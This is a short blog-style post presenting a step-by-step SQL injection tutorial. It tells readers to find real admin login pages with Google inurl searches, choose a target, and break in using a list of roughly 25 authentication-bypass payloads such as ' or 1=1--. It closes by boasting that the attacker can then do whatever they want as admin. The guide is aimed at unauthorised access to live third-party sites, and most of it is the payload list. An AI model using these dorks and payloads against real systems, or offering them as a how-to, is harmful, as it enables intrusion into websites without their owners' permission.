SQL Injection

1. Open browser and go to google.com

2. In search box, type this (choose)

  • inurl:/admin_login.asp
  • inurl:/admin/admin_login.asp
  • inurl:/administrator.asp



3. Choose your target.




4. Choose this and type in username & password. In this step I choose to using this one 'or' '='

'or' '='

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a





5. Now I can login as a admin and have same right and can do what ever I want. Very simple.
Subscribe to: Comments (Atom)
 
ss_blog_claim=33848eee9015378102742a58c7d46319